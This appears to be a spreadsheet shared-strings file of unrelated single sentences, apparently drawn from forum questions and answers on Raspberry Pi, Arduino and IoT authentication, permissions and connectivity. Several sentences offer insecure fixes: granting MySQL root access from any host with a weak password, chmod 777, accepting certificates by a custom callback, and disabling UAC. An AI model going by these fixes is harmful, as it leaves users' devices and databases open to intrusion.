    <t>The permissions of the folder (with the usb drive mounted at usb) look like this....</t>
  </si>
  <si>
    <t>But when I try to connect from raspberry pi, although I enter the right password, I get "permission denied" error.</t>
  </si>
  <si>
    <t>Registering the cards on the database is my problem.</t>
  </si>
  <si>
    <t>Now what I am trying to do is to do face recognition I have followed few tutorials but none of them is working for me.</t>
  </si>
  <si>
    <t>Then when you click one it asks for a password and when I push a button 'Connect', it connects to the network.</t>
  </si>
  <si>
    <t>I want to get this problem fixed before I decide if I'm going to use Radius for authentication.</t>
  </si>
  <si>
    <t>For simply, i want to :
print ("NumLock is ON") # if num lock is on without any key pressed before or using keypressevent.</t>
  </si>
  <si>
    <t>Each of the two numbers entered by the user are stored in their variables respectively.</t>
  </si>
  <si>
    <t>I am doing a project on ESP8266 - HUZZAH breakout that decodes morse code and send the SOS message via Wi-Fi after RFID access.</t>
  </si>
  <si>
    <t>I would also be ok having one device connect to network and configure wifi, then clone its SD card into another one.</t>
  </si>
  <si>
    <t>What if those apps need to be updated, for example to fix a security issue?</t>
  </si>
  <si>
    <t>I can connect to my WIFI network without problems, I can even SSH into this new PI when connected to my network.</t>
  </si>
  <si>
    <t>I've heard that I can use rsync for this, but only read about people using it with SSH.</t>
  </si>
  <si>
    <t>https://www.raspberrypi.org/forums/view ... hp?t=62371
Now the second issue i faced is WPA2 authentication.</t>
  </si>
  <si>
    <t>I am facing problem while adding blockchain extension to IoT service.That extension is not opend at all.</t>
  </si>
  <si>
    <t>git clone git@github.com:google-cloud/speech permission denied (publickey)
I'm still quite new at linux so i'm not quite sure what i'm doing wrong or what the problem even could be.</t>
  </si>
  <si>
    <t>I pulled my Raspberry Pi out from storage and have forgotten my username and password.</t>
  </si>
  <si>
    <t>This is happening when using % sign in the password string.</t>
  </si>
  <si>
    <t>My question is: Is there a way in Python on the Raspberry Pi to detect which barcode scanner is sending the barcode?</t>
  </si>
  <si>
    <t>I have tried using chmod 777 to change file and directory permissions but this has not resolved the issue.</t>
  </si>
  <si>
    <t>Which means, The Wifi_SSID and Password are fetched by ESP correctly.</t>
  </si>
  <si>
    <t>when system try to read the file for facial recognition it throws error.</t>
  </si>
  <si>
    <t>Furthermore, it appears that I have MariaDB instead of MySQL--so I tried some tutorials to reset that password, again, nothing.</t>
  </si>
  <si>
    <t>Hello I'm coming with up an error when I'm using popen with my facial recognition software, in Python version 3.</t>
  </si>
  <si>
    <t>There is an authentication problem in Win 10 Insiders preview build 10.0.17035.1000.</t>
  </si>
  <si>
    <t>When connectin with PuTTy just black screen, even no password prompt.</t>
  </si>
  <si>
    <t>This alone wouldn't be a problem but the phone isn't detected anymore after all of that.</t>
  </si>
  <si>
    <t>First i thougt it was a permission issue because i run everything as a normal user , but in vm i did the same thing and nothing changed.</t>
  </si>
  <si>
    <t>I'm trying to write a code that utilizes face-recognition, and with that i need to be able to access subfolders.</t>
  </si>
  <si>
    <t>When I boot it up, It says 
Then I ssh into it and in ssh session, I type
I see my input pi immediately on the other login screen.</t>
  </si>
  <si>
    <t>Am I somehow using this wrong or is there really a 1024 character limit for JWT tokens in AWS authorizers?</t>
  </si>
  <si>
    <t>I had now problem configuring the IPSec connexion to an AWS VPC and my sims can successfully ping all instance in my AWS VPC.</t>
  </si>
  <si>
    <t>How to scan barcode using Raspberry pi camera module V2
This is the link to my previously asked question about barcode scanning.</t>
  </si>
  <si>
    <t>Do you have any ideas how i could login automatically into my session?</t>
  </si>
  <si>
    <t>I am able to successfully ssh on to the Pi using the command:
and then entering the password.</t>
  </si>
  <si>
    <t>I am able to get on the citadel's login screen with my browser on port 8080 and I can't seem to get passed the login screen.</t>
  </si>
  <si>
    <t>I know that because I don't get any errors like wrong password or user does not exist, after clicking login I get nothing.</t>
  </si>
  <si>
    <t>I think that if I know how to correctly build the APK which is able to let a device be enrolled as COPE, I can get a lot further.</t>
  </si>
  <si>
    <t>When I try to issue commands to the lock through the raspberry pi, nothing happens.</t>
  </si>
  <si>
    <t>The errors declared are "identifier is undefined" and "use of undeclared identifier".</t>
  </si>
  <si>
    <t>I'm having trouble authenticating with key A when it comes to multiple readers.</t>
  </si>
  <si>
    <t>It doesn't happen on PC - MainPage appears immediately, no exceptions, no deadlocks.</t>
  </si>
  <si>
    <t>I guess these errors are due to malicious payloads or anything like that.</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/azure/container-registry/container-registry-authentication
IoT Edge : device can't download my module from Azure Container Registry but it can from dockerhub
Could you help to solve this problem?</t>
  </si>
  <si>
    <t>However, ESP8266WebServer drops connection with the client when wrong WiFi password is provided.</t>
  </si>
  <si>
    <t>So, somehow, supplying wrong password to it messes up the response.</t>
  </si>
  <si>
    <t>When using SecurityProviderTpmSimulator,I am able to get assigned Iothub i.e enrolled to DPS but when using SecurityProviderTpmHsm,it doesn't help us to get assigned iothub</t>
  </si>
  <si>
    <t>I finally found out how to change the ssh port in the raspberry pi and changed it to 53.</t>
  </si>
  <si>
    <t>Registering an InstanceCreator with Gson for this type may fix this problem.</t>
  </si>
  <si>
    <t>Hi I would like to create a smart door lock system using raspberry pi and blockchain.</t>
  </si>
  <si>
    <t>In addition, this application should run on a 5 "touch screen, where only authorized users can access this application.</t>
  </si>
  <si>
    <t>My problem occurs when I try to log into the wifi with my phone.</t>
  </si>
  <si>
    <t>I want to connect to hidden enterprise network using username and password.</t>
  </si>
  <si>
    <t>the prompt states...
Download Corrupt: One or more of the files the files is corrupted.</t>
  </si>
  <si>
    <t>It partially works: The phone is able to pair with the device, the device can see the phone in the bluetoothctl UI, SDPtool can see the services (RFCOMM) exposed by the device.</t>
  </si>
  <si>
    <t>I'm working on a django based lock/access system with an RFID reader.</t>
  </si>
  <si>
    <t>The algorithm to unsign the password is considerably more complex than a simple xor (thus harder to spot.)</t>
  </si>
  <si>
    <t>A MAC address is a globally unique identifier for a particular device.</t>
  </si>
  <si>
    <t>According to this article one way you can do that is by looking at the :
In the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services there are several relevant subkeys: usbaudio, usbccgb, usbehci, usbprint, usbscan and so on.</t>
  </si>
  <si>
    <t>So, after some research and trial/error my problem was the raspberry pi being hidden behind my mac.</t>
  </si>
  <si>
    <t>When connecting to Xively, you use your api key as username and null for the password:
You should probably use something a bit more unique than arduinoMQTT as the client id as well.</t>
  </si>
  <si>
    <t>Looks like you will need to escape all url unsafe characters, /, and ,.</t>
  </si>
  <si>
    <t>With Android HCE you emulate an ISO 14443-4 (ISO-DEP) contactless smartcard.</t>
  </si>
  <si>
    <t>well, as @Bibhas says, your problem is that  is having the wrong permissions, and that has nothing to do with Arduino or sublime text.</t>
  </si>
  <si>
    <t>Try to run it, and if it asks you for a password you know you have a permission problem and need to change permissions so that it does not require the password to execute.</t>
  </si>
  <si>
    <t>In addition to this, maybe there could be some kind of issue with r/w folder's permissions.</t>
  </si>
  <si>
    <t>Because the signature of that destructor really should be
I'm going to look into my crystal ball and say that - maybe - somewhere you might have  or similar hidden in your codebase.</t>
  </si>
  <si>
    <t>The % characters in the arguments to the date command are being intercepted by the cron daemon, and changed into newlines.</t>
  </si>
  <si>
    <t>I believe the cancellation tokens in the original code may have been part of the issue.</t>
  </si>
  <si>
    <t>That's why one needs to know which terminal settings should be used to decode input.</t>
  </si>
  <si>
    <t>The characters are getting corrupted by having their high (8th) bit turned on.</t>
  </si>
  <si>
    <t>I figured out it was caused by wrong flashing using Windows IoT Dashboard which is somehow corrupted.</t>
  </si>
  <si>
    <t>So running sudo apt-get install libssl-dev might solve your problem.</t>
  </si>
  <si>
    <t>If both Pi's are on your WiFi network you can surely use SSH between them to run various commands... "ssh pi@192.168.1.x".</t>
  </si>
  <si>
    <t>It could be that it is below the detection threshold of this sensor, especially when the door is opened slowly.</t>
  </si>
  <si>
    <t>EDIT 12th of April:
It seems like this issue with the Firewall not being opened, was actually a known issue by Microsoft already.</t>
  </si>
  <si>
    <t>To sum up:
It's possible that its just hardware, so try to see if you can expose the camera manually.</t>
  </si>
  <si>
    <t>A user is more
  likely to be able to enter an ASCII password or pass-phrase, even
  though doing so limits the set of possible keys.</t>
  </si>
  <si>
    <t>If no slave devices recognize the address, the result is a NACK.</t>
  </si>
  <si>
    <t>If it matches your scenario, you can fix that by registering your Dash button again.</t>
  </si>
  <si>
    <t>So we have a tiny hidden problem like proxy etc.</t>
  </si>
  <si>
    <t>Problem solved:
If a shell application requires elevated permissions, UAC must be turned off.</t>
  </si>
  <si>
    <t>SSH into your RPi using puTTy if you are using windows, or type ssh
pi@ipAddress if you are using Linux.</t>
  </si>
  <si>
    <t>The code  changes the background of all container which contains the class "doors".</t>
  </si>
  <si>
    <t>Like others said, face detection is very computationally expensive using HOG/Haar descriptors.</t>
  </si>
  <si>
    <t>Simply running "xauth" as Pi at the command line told me which file was being used by xauthority (/home/pi/.Xauthority in this case.)</t>
  </si>
  <si>
    <t>And the first extra character is '\n' (Enter Key) and the std::cin.get() will return 0.</t>
  </si>
  <si>
    <t>This is similar to ssh-could-not-resolve-hostname-name-or-service-not-known.</t>
  </si>
  <si>
    <t>There are lots of ways to do "presence detection" electrically, but nothing that you will find intrinsically in the SoC.</t>
  </si>
  <si>
    <t>This might be the cause of resetting your ESP82660, if corrupted data is sent with wifi.send.</t>
  </si>
  <si>
    <t>One possibility:
Use a webcam with infrared capability (such as a security camera with built-in IR illumination).</t>
  </si>
  <si>
    <t>Maybe someone can tell me how to fix my mistake with the permissions and set the right ones ;)
sources:
https://www.raspberrypi.org/forums/viewtopic.php?f=29&amp;t=162960,
https://magento.com/tech-resources/download</t>
  </si>
  <si>
    <t>Based on this page, you might be getting a corrupt SD card.</t>
  </si>
  <si>
    <t>Provide a switch, button, etc, that will tell the Arduino that the user wants to input a new passcode.</t>
  </si>
  <si>
    <t>So, when you connected to that SSID, did your phone prompt you for a username (and password)?</t>
  </si>
  <si>
    <t>Encountered similar problem when dealing with Federated identity.</t>
  </si>
  <si>
    <t>Someone accidentally caused ssh to be removed from that list, which has since been fixed.</t>
  </si>
  <si>
    <t>If it does not do this, then the phone has a faulty RSSI sensor of firmware that decodes its value.</t>
  </si>
  <si>
    <t>Setting pathlen to 1 in the root CA certificate fixed the problem.</t>
  </si>
  <si>
    <t>It has: AppNonce NetID DevAddr DLSettings RxDelay CFList, and is
  encrypted with the AppKey which is network unique and not node unique.</t>
  </si>
  <si>
    <t>The problem then cleared up on its own, without me issuing a new cert.</t>
  </si>
  <si>
    <t>Please wait patiently till it is fixed.So at the moment, you can use SSH instead.</t>
  </si>
  <si>
    <t>IoT Hub connection string (iothubowner) will be exposed in the API in couple of months
2.</t>
  </si>
  <si>
    <t>This functionality could reset auomatically your arduino if you dont reset the watchdog during the lapse.</t>
  </si>
  <si>
    <t>Even though this probably won't solve the core issue, you might be able to circumvent it.</t>
  </si>
  <si>
    <t>Raspberry Pis are cheap hardware, not exactly the most reliable things.</t>
  </si>
  <si>
    <t>However if what you're really after is the values encoded in the JSON, you should be able to use the json module to retrieve them into a dict:
import json
j = json.loads(buff[0:buff.find(b'\xff')])
ssid = j['ssid']
password = j['password']</t>
  </si>
  <si>
    <t>A barcode reader (or barcode scanner) is an electronic device for reading printed barcodes.</t>
  </si>
  <si>
    <t>A very high-density barcode semiotics used for alphanumeric or numeric-only barcodes.</t>
  </si>
  <si>
    <t>ReadKey() is a console method for obtaining the next character
pressed by the user.</t>
  </si>
  <si>
    <t>SecureCRT for Windows, Mac, and Linux provides terminal emulation for computing professionals.</t>
  </si>
  <si>
    <t>The Java Code Clone Detection API (JCCD) allows to implement individual code clone detectors.</t>
  </si>
  <si>
    <t>Sometimes people use keys instead of passwords due to the increased strength of the keys.</t>
  </si>
  <si>
    <t>Our focus is on using the built-in camera on mobile phones to scan and decode barcodes on the device, without communicating with a server.</t>
  </si>
  <si>
    <t>When a person logs into your app via Facebook Login you can access a subset of that person's data stored on Facebook.</t>
  </si>
  <si>
    <t>It allows for 2-track reading, bi-lateral swipe reading and encrypted data.</t>
  </si>
  <si>
    <t>All established payment cards are accepted: Visa, Visa Electron, MasterCard, Diners Club and JCB.</t>
  </si>
  <si>
    <t>Your bundle ID must be registered with Apple and be unique to your app.</t>
  </si>
  <si>
    <t>When the app is installed, its assigned a unique identifier used for analytics.</t>
  </si>
  <si>
    <t>The PIA is always
  signed by the publisher of the original COM type.</t>
  </si>
  <si>
    <t>Detection
User-agent detection can be hard, especially in the mobile world.</t>
  </si>
  <si>
    <t>Full-length plus codes can be encoded or decoded offline.</t>
  </si>
  <si>
    <t>X.509 was initially issued on July 3, 1988 and was begun in association with the X.500 standard.</t>
  </si>
  <si>
    <t>Wikipedia page for Universally Unique Identifier
See also: guid</t>
  </si>
  <si>
    <t>Cydia is an iOS app created by Jay Freeman (more commonly known as saurik) for jailbroken iPhones, iPod Touches and iPads.</t>
  </si>
  <si>
    <t>Guidelines for the selection of passwords are also outside the scope.</t>
  </si>
  <si>
    <t>XHP automatically escapes all input data making it near-fool proof to XSS vulnerabilities.</t>
  </si>
  <si>
    <t>I tried "su - www-data" to see if I could attempt the script as that user, but it asks for a password, which I never set up (and a blank password didn't work).</t>
  </si>
  <si>
    <t>Does anyone know how to decode this X10 Code correctly using C#, or can someone point me to the right Protocol specifications.</t>
  </si>
  <si>
    <t>The login screen and buttons serve their functions properly.</t>
  </si>
  <si>
    <t>I have made it to this part until the command below through ssh and getting some kind of CFFI missing error.</t>
  </si>
  <si>
    <t>Looks like this is possible on Windows with some hackery, but the issue lies deeper on posix.</t>
  </si>
  <si>
    <t>So that a similar pattern with softer or louder knocks will not activate the lock.</t>
  </si>
  <si>
    <t>If that does not solve your problem you can always hook to the ServicePointManager.ServerCertificateValidationCallback event and accept the certificate by yourself.</t>
  </si>
  <si>
    <t>ANOTHER THING: IMAGE IS FOR DATALOGIC BARCODE CODE SCANNER QW2100 LITE, SO CHECK YOUR BARCODE MANUEL CAREFULLY TOO.</t>
  </si>
  <si>
    <t>It's probably user permission issues, because you get the output running script under your user from terminal.</t>
  </si>
  <si>
    <t>$ is a valid character and is usually accepted by LDAP servers in passwords.</t>
  </si>
  <si>
    <t>A security process that automatically escapes incoming data to the PHP script.</t>
  </si>
  <si>
    <t>These containers serve as a way to simulate code that would otherwise cause irreversible changes to a systems hardware.</t>
  </si>
  <si>
    <t>But for now I want to be able to remote SSH to the pi while testing, and have the out put from the perl script to a connected screen.</t>
  </si>
  <si>
    <t>Being somewhat of a newbie I was wondering if there is a way to hard-code something on a peripheral that would only allow a single unique central/master to connect.....?</t>
  </si>
  <si>
    <t>This message shows up in the console:
serialport-1.3.1/lib/serialport.rb:25:in `create': Permission denied - /dev/ttyS6 (Errno::EACCES)
I already tried these solutions:
chown -R myUserName ./*
sudo chown -R user_name file_name
chmod a+w &lt;folder&gt;
How can I allow the conection?</t>
  </si>
  <si>
    <t>I got my Raspberry Pi 3 and after I installed Raspbian on it and put the SSH.txt file in the boot folder I tried to connect to it from another computer via Putty.</t>
  </si>
  <si>
    <t>I would recommend having a key/id of some sort be associated with a registered fingerprint from the scanner.</t>
  </si>
  <si>
    <t>I faced the same problem today, please check for the path of the image as mentioned by cybseccrypt.</t>
  </si>
  <si>
    <t>Here he analyzes the code and has a video clip showing the face-detection-code in action.</t>
  </si>
  <si>
    <t>In your case, since it is called every 2 minutes, you can call gc.login() every 2 minutes.</t>
  </si>
  <si>
    <t>This is by design.The root folders that Device Portal shows are hardcoded.</t>
  </si>
  <si>
    <t>gorilla/securecookie encodes and decodes authenticated and optionally encrypted cookie values.</t>
  </si>
  <si>
    <t>When combining more than one factor, using other items like a RFID card, biometrics or digital certificates, we get a multi-factor-authentication system.</t>
  </si>
  <si>
    <t>Nexus Professional also displays up-to-date information about known security vulnerabilities and license issues.</t>
  </si>
  <si>
    <t>I've installed Node.js and am currently running a script by making an SSH connection through puTTY.</t>
  </si>
  <si>
    <t>Observations:
On a Android device i turned on bluetooth in device settings, HC-05
was able to be discovered, enter 0000/1234 (password as per
documentation).</t>
  </si>
  <si>
    <t>I tried  to change bauds, but the NodeMCU header with firmware details makes me think that hardware communication is correctly set.</t>
  </si>
  <si>
    <t>So check first, if your distribution is in there (I guess either Debian or Raspbian) and try the passwords there at the login prompt.</t>
  </si>
  <si>
    <t>But a bigger problem about Glass Wifi is that it only supports WEP -hackable by high school students- and WPA/WPA2.</t>
  </si>
  <si>
    <t>In this situation in order to continue the NDEF Detection Procedure the MIFARE Classic or MIFARE Plus needs to be re-activated and selected.</t>
  </si>
  <si>
    <t>This fingerprint changes from time to time (the root CA certificate changes less often, maybe every 10 years, and can also be used).</t>
  </si>
  <si>
    <t>A problem caused by naive search/replace censorship, turning classic into clbuttic - related to the Scunthorpe problem.</t>
  </si>
  <si>
    <t>Any virus will by definition make unauthorised changes to a computer, which is undesirable even if no damage is done or intended.</t>
  </si>
  <si>
    <t>I'm trying to make a door lock/unlock mechanism using and arduino UNO and Bluesmirf HID (https://www.sparkfun.com/products/10938).</t>
  </si>
  <si>
    <t>I'm trying to make a simple program that can receive IR codes and at the same time send another IR code when I press on a button.</t>
  </si>
  <si>
    <t>I can always assign a public IP to my Docker and connect through the public IP but I think that makes no sense and there is an alternative like I do with other services using something like
when starting the Docker.</t>
  </si>
  <si>
    <t>If it helps at all, the big picture is to build an Arduino controlled RFID reader/writer, tape underneath desk, and with an NFC tag, wave over the reader to login to windows 10.</t>
  </si>
  <si>
    <t>If you face trouble finding missing dll's, enable full debug messages in Otk.</t>
  </si>
  <si>
    <t>Note that checking the value of baudrate is not a reliable way to confirm success - it simply contains the request baudrate you supply.</t>
  </si>
  <si>
    <t>Or if there is way for them to input the wifi passwords for the local wifi, then you can do any kind of device identification when you show some secret on the website and ask the user to enter it on the device(s).</t>
  </si>
  <si>
    <t>For example as follows in a preprocessing servlet:
String username = request.getParameter("username");
String password = request.getParameter("password");
User user = userService.find(username, password);
if (user != null) { 
  request.getSession().setAttribute("user", user); // Make available by ${user} in session scope.</t>
  </si>
  <si>
    <t>With all that infrastructure in place, you then need to use the gadget API to act as a HID and issue HID reports that will be understood as mouse motion.</t>
  </si>
  <si>
    <t>It's pretty focused on the HID class of USB devices, so if you CAN based driver doesn't present itself as a HID device, you might be in for some pretty significant work.</t>
  </si>
  <si>
    <t>If anyone else rus into same idea:
I found out, that HC-05 and similar modules implements SPP bluetooth profile, whereas keyboard using HID profile, wich is more secure and complicated.</t>
  </si>
  <si>
    <t>Some things that need to be active before this will work:
1) Network registration
if it doesn't then you can start by turning on and off the modem by inputting AT+CFUN=0 and then AT+CFUN=1
if you are still having problems registering make sure you have selected the correct network:
    AT+COPS?</t>
  </si>
  <si>
    <t>The intent is to make a compromise of a password database less likely to result in an attacker gaining knowledge of the plaintext passwords (e.g.</t>
  </si>
  <si>
    <t>If the coder doesn't take the necessary precautions to validate target/input, it will result in data being fed into adjacent memory cells corrupting whatever contents is stored within them.</t>
  </si>
  <si>
    <t>Cross-Origin Videos and Images
Due to security limitations of WebGL, Seriously.js can only process video or images that are served from the same domain, unless they are served with CORS headers.</t>
  </si>
  <si>
    <t>Can I rely on this to create a UDEV rule to assign a particular mount point, or does a unique and reliable mount point get already created in /dev/serial/by-id/, which I can use instead of hacked-udev rules?</t>
  </si>
  <si>
    <t>The problem is when anything attempts to connect to the server I get the following exception:
or
Ideal situation would be to be able to create a PFX certificate that appears to work correctly (I can browse to the server and get no exceptions just warnings about non trusted CA as its self signed).</t>
  </si>
  <si>
    <t>From my experience, I know it's a host name, a device id, and a symmetric key - though I was hoping for an azure function to generate it to isolate myself from issues down the road if the connection string generation changes.</t>
  </si>
  <si>
    <t>I make an asp.net core windows auth application with HttpSys server and the dev machine works without any problem but when I upload it to Windows 10 IoT Core we get the following problem:
And my Auth Settings are:
and
services.AddAuthentication(HttpSysDefaults.AuthenticationScheme);</t>
  </si>
  <si>
    <t>Depending on the protocol design, you could send an error code to the PC so the person typing at the terminal or the software on that side knows the last command it sent was invalid or not received correctly.</t>
  </si>
  <si>
    <t>* TO 'root'@'%' IDENTIFIED BY 'beta' WITH GRANT OPTION;
Here 'root' is the mysql user and 'beta' is the password and here privileges are set for 'root'.Change it accordingly and execute above query in mysql cli.</t>
  </si>
  <si>
    <t>All those profiles are standarized so you can plug your phone to a computer and establish a "serial communication" channel, among other things, without having to code communication drivers for the computer or the phone.</t>
  </si>
  <si>
    <t>777 = "-rwxrwxrwx" = rwx for all
The first character in the mode string  indicates file type and is not related to permissions, a couple of examples:
-rwxrwxrwx  // normal file
drwxrwxrwx  // directory
lrwxrwxrwx  // symbolic link
prwxrwxrwx  // named pipe
srwxrwxrwx  // socket
From maketecheasier:  
Every file and folder contains 8-bit data that controls the permissions.</t>
  </si>
  <si>
    <t>One point to note at present is that you need to setup public key authentication so you have passwordless login, otherwise you'll need to enter your Raspberry Pi's password multiple times, and it will ultimately fail.</t>
  </si>
  <si>
    <t>If so, how do I have to change the permissions to make it work?</t>
  </si>
  <si>
    <t>For example:
SELECT * FROM users WHERE username = 'bob'
vs
SELECT * FROM users WHERE username = ?</t>
  </si>
  <si>
    <t>After that I cannot even check the Admin Log-in screen.</t>
  </si>
  <si>
    <t>It seems like something is corrupt or encountering an end-of-file right?</t>
  </si>
  <si>
    <t>Issue: Website will not login automatically.</t>
  </si>
  <si>
    <t>Kiosk user will enter automatically after boot.</t>
  </si>
  <si>
    <t>But they are very inaccurate, and takes a couple of seconds to scan all the beacons.</t>
  </si>
  <si>
    <t>(Invoke)
This is how I recently coded a HID card swiping system.</t>
  </si>
  <si>
    <t>But the only thing I was missing was the password of the devops user.</t>
  </si>
  <si>
    <t>So basically everyone can just roll his or her head over my keyboard to unlock my pi.</t>
  </si>
  <si>
    <t>The command prompt says  BUT if I do printenv it displays the correct env for the user that I want to log in with.</t>
  </si>
  <si>
    <t>I'm using a raspberry pi camera to read barcodes from an image, and the object needs to be relatively far from the camera in my application.</t>
  </si>
  <si>
    <t>but putty doesn't connect till I run 'sudo service ssh restart' command from terminal for which at least a keyboard is required which kinda defies the purpose.</t>
  </si>
  <si>
    <t>But something kept failing until I realized that a bigger file (around 10kb) was corrupt.</t>
  </si>
  <si>
    <t>The problem is, some of the webpages that need to be displayed are locked behind a login.</t>
  </si>
  <si>
    <t>I am working on an IoTEdge Module with image detection capabilities.</t>
  </si>
  <si>
    <t>It also contains very naive edge detection as it was needed for gpio.Button to work.</t>
  </si>
  <si>
    <t>As it turns out, running a HID service is not allowed according to this Microsoft answer on github.</t>
  </si>
  <si>
    <t>The original idea and the mechanism were from rstunnel (Reliable SSH Tunnel).</t>
  </si>
  <si>
    <t>simple username (email) and password.</t>
  </si>
  <si>
    <t>This password is written in the code and I would like to hide the password from malicious readers who have access to the .o files and .hex files.</t>
  </si>
  <si>
    <t>My phone is jailbroken, so I am open to other non-apple ways for sending signals.</t>
  </si>
  <si>
    <t>This is the same question as in
Change keyboard locks in Python
or
How to change caps lock status without key press.</t>
  </si>
  <si>
    <t>I have investigated weak pull down for the input and other possible configuration issues to no avail.</t>
  </si>
  <si>
    <t>Door opening and locking is another situation where iBeacon would be unusable (and NFC would work much better here).</t>
  </si>
  <si>
    <t>So far I am using a local keyboard and monitor but ultimate goal is to get all this working over ssh using something like putty.</t>
  </si>
  <si>
    <t>But there are two problems I'm not sure how to solve:
I have multiple devices for multiple users so some kind of Login must be provided.</t>
  </si>
  <si>
    <t>The Incoming audio stream is correctly encoded with AAC codec.</t>
  </si>
  <si>
    <t>I use following code to insert sysex events
PatternData is
I did something wrong because after call MusicSequenceFileCreate i get corrupted file.</t>
  </si>
  <si>
    <t>my main problem is that the certificate is too big and this protocol seems too heavy for my ATMEGA328P-MU.</t>
  </si>
  <si>
    <t>Any suggestions that you may have would be great so I can SSH into my pi without having a monitor present.</t>
  </si>
  <si>
    <t>And how should I solve this issue and let the server receive a valid package?</t>
  </si>
  <si>
    <t>characters are corrupted by having their high bit set.</t>
  </si>
  <si>
    <t>The device is recognized, but I'm unsure if I'm sending/receiving the data correctly.</t>
  </si>
  <si>
    <t>But know I try to avoid to corrupt my SD card of my raspberry and I want to use the read-only mode.</t>
  </si>
  <si>
    <t>I want to start program when I enter my webpage, and problem is in permissions(??)</t>
  </si>
  <si>
    <t>The real problem was sloppy swallowed and the status code of a permission issue returned.</t>
  </si>
  <si>
    <t>i want to use my raspberry pi as a SIP/VOIP-Phone, just controlling the RPI via SSH.</t>
  </si>
  <si>
    <t>In the password I write the one that MYSQL prompt me to enter when it was installing.</t>
  </si>
  <si>
    <t>I think the problem has something to do with the actual Linux permissions overriding the ones set in samba, but I don't know how to fix that.</t>
  </si>
  <si>
    <t>I changed  file in etc/network and the wpa_supplicant.conf file, addding the SSID and the psk password for my wifi connection.</t>
  </si>
  <si>
    <t>On this character is detected, the byte stream before this character gets stored into a buffer.</t>
  </si>
  <si>
    <t>On one hand, the consumer can't be bothered to enter its own SMTP credentials.</t>
  </si>
  <si>
    <t>I'm trying to connect to an unsecured WEP wifi with the following code:
It ends with status "2" meaning wrong password.</t>
  </si>
  <si>
    <t>Basically, I have created a site and purchased an SSL certificate.</t>
  </si>
  <si>
    <t>The query used for the analytics job is the following:
I've seen other issues somehow similar but the accepted answer was that there was a bug at Microsoft.</t>
  </si>
  <si>
    <t>I'm really confused to get a firmware form my smart card reader.</t>
  </si>
  <si>
    <t>I guess there are some privileges issues, but my research didn't give any results.</t>
  </si>
  <si>
    <t>I have tried changing /etc/network/interfaces file  
My /etc/network/interfaces file    
When I looked into raspberry pi login screen i'm able to see two ip address.But ssh only works with 10.21.113.60
Someone please help me with this.</t>
  </si>
  <si>
    <t>On my current project, I have RFID badges which sends a 10 chars ID to my  (ex: 2700BBA0E8).</t>
  </si>
  <si>
    <t>Here's my code:
The commands where I input the SSID and Password are the ones causing trouble.</t>
  </si>
  <si>
    <t>running the IDE under Admin privileges didn't solve the problem.</t>
  </si>
  <si>
    <t>That is, the file with the default sd card is thrown to the root folder /, which does not have permission chmod?</t>
  </si>
  <si>
    <t>Tha problem is that I could'nt use it :( 
It is basically unsing this function to decrypt LoRaWAN packet:
So what I did is the following:
But I am getting dummy values...
Any idea how to decrypt LoRaWAN packet in Java?</t>
  </si>
  <si>
    <t>systems is a simple table of key:value pairs, where key is the unique system id, and value is the unique system name.</t>
  </si>
  <si>
    <t>I'm wondering how you guys handle it, because the fingerprint can change over time.</t>
  </si>
  <si>
    <t>I've tried scanning using iPhone but the external BLE module cannot be spotted.</t>
  </si>
  <si>
    <t>I figure it must be a policy/permissions-based issue with AWS, but I am confident that I have the correct permissions.</t>
  </si>
  <si>
    <t>In other words, how can connect to wireless and get a link local IP without SSID and password?</t>
  </si>
  <si>
    <t>what I want to do :
use Raspi zero &amp; wifi dongle to build a access point, so that other device like smart phone or PC can access to rasperry pi directly.</t>
  </si>
  <si>
    <t>This is the LUA code I am using for the board:
I have changed some values like IP address, wifi, password etc for privacy.</t>
  </si>
  <si>
    <t>I've also changed
  [wso2iothome]/conf/api-manager.xml by replacing ${admin.password}
  entries with my new password.</t>
  </si>
  <si>
    <t>I'm currently building a Smart Home project but I'm having some difficulty with the code regarding the doorbell.</t>
  </si>
  <si>
    <t>My guess is that incoming pyserial data is not being decoded properly by the .ino script.</t>
  </si>
  <si>
    <t>She solved the problem only after restarting the device in safe mode.</t>
  </si>
  <si>
    <t>I have been working through a number of online tutorials to reset my MySQL password but None of them have worked.</t>
  </si>
  <si>
    <t>I'm supposed to come up with an app for raspi where-in user on entering an id, the id is to be authenticated by the app if ID is present in the DB.</t>
  </si>
  <si>
    <t>I already tried updating the database users password using the OLD_PASSWORD function of MySQL, but it didn't help.</t>
  </si>
  <si>
    <t>But even still I dont really want to RESET any passwords, I am starting with a fresh installation.</t>
  </si>
  <si>
    <t>It must be a default password but i cant find anywhere what that default password is.</t>
  </si>
  <si>
    <t>Is there any way I can eliminate the need for entering a password every time I want to run a command?</t>
  </si>
  <si>
    <t>We are working with a scenario where a device can be "unlocked" and we want to be certain that the unlock-state is properly propagated the server.</t>
  </si>
  <si>
    <t>I can only find hacks (like here and here) that returned errors that the file was corrupted (at best, often it didn't even receive the file).</t>
  </si>
  <si>
    <t>The system where it is not working on identify the pi zero as "Unknown device" and then never "re-identify" it as the keyboard which it is supposed to be.</t>
  </si>
  <si>
    <t>Even though the face detection stage works, its response was quite slow.</t>
  </si>
  <si>
    <t>I have problem while trying to setup my offline voice detection on my Pi2 (SNOWBOY) with:
.</t>
  </si>
  <si>
    <t>I think the issue is the fact its a secure server and the layout of my request.</t>
  </si>
  <si>
    <t>Same thing is happening for device user, I am unable to change device owner.</t>
  </si>
  <si>
    <t>For instance, in the wifi system settings I cannot enter the SSID password.</t>
  </si>
  <si>
    <t>Basically, my set up will consist of two devices, the first will be the security camera which will be a raspberry pi zero and a pi camera.</t>
  </si>
  <si>
    <t>I am creating a login system, and I want to create a reset password option for the user.</t>
  </si>
  <si>
    <t>The bt-agent tool is able to correctly verify the password.</t>
  </si>
  <si>
    <t>I am getting an Ip address and using Putty to get an SSH session, but I am not able to access the internet in the pi.</t>
  </si>
  <si>
    <t>I am trying to deploy a capitative portal that will validate the username and passwords.</t>
  </si>
  <si>
    <t>The problem is, that both drones open an Access Point with the same IP-Ranges and this can't be changed.</t>
  </si>
  <si>
    <t>This while command is so quick that it needs some delay so that i can enter the password"123456789".</t>
  </si>
  <si>
    <t>My code for arduino nano is: 
and my nodemcu code is:
Now the problem is that when i enter the password from keypad, this while(s.available&gt;0) line when given second time, it does not work.</t>
  </si>
  <si>
    <t>There are no error messages except when I type the password it fails to login
When I log in over ssh there are no issues what so ever.</t>
  </si>
  <si>
    <t>I want to disable the wifi auto login and enter my own SSID and password.</t>
  </si>
  <si>
